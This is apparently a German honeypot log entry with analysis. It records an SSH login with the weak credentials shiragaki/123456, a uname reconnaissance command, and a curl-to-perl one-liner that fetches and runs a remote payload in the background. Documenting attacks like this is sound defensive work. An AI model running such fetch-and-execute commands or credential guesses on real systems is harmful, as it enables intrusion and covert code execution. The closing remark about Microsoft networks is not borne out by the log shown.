30.09.2026, 03:58 UTC · 2 Befehle · über ssh · Australien
user='shiragaki' pass='123456' shiragaki@srv01:~$ uname -a 2>/dev/null Linux srv01 4.15.0-213-generic #213-Ubuntu SMP Fri Mar 11 13:42:28 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux shiragaki@srv01:~$ curl -sS --max-time 1 http://[IP]/zed 2>/dev/null | perl & [1] 1423
Ein Angreifer meldete sich über SSH mit den Credentials shiragaki und 123456 an. Nach der Anmeldung führte er zunächst eine Systemabfrage durch, um die Kernel- und Architekturinformationen des Zielsystems zu ermitteln. Anschließend lud er eine Datei von einem externen Server herunter und leitete diese direkt an den Perl-Interpreter weiter, um Code auszuführen.
Der Befehl uname -a gibt detaillierte Informationen über den Linux-Kernel und die Hardware-Architektur aus, wobei Fehlermeldungen unterdrückt werden. Das curl-Kommando lädt eine Datei namens zed vom angegebenen Server herunter, wobei die Option --max-time 1 einen Timeout von einer Sekunde erzwingt, um hängende Verbindungen zu vermeiden. Die Pipe leitet den empfangenen Datenstrom direkt an perl weiter, was bedeutet, dass der Inhalt der Datei als Perl-Skript interpretiert und ausgeführt wird. Die Ausgabe [1] 1423 zeigt an, dass der Prozess im Hintergrund gestartet wurde.
Das Vorgehen deutet auf die Installation eines Botnet-Agents oder eines Kryptominers hin, da der Angreifer versucht, fremden Code ohne Zwischenspeicherung auf der Festplatte auszuführen. Die Verwendung von Perl als Ausführungsumgebung ist ein typisches Muster für Skripte, die sich in bestehenden Prozessen einnisten oder Ressourcen missbrauchen. Da keine weiteren Persistenz-Befehle sichtbar sind, bleibt das genaue Endziel der Payload offen.
Dieses Muster ist im Honeypot-Betrieb sehr häufig anzutreffen, da automatisierte Scanner standardisierte Skripte über kurze Timeouts verteilen. Die Nutzung von Microsoft-Netzwerken als Absprungpunkt ist ebenfalls ein bekanntes Phänomen, das oft auf kompromittierte Cloud-Instanzen hindeutet.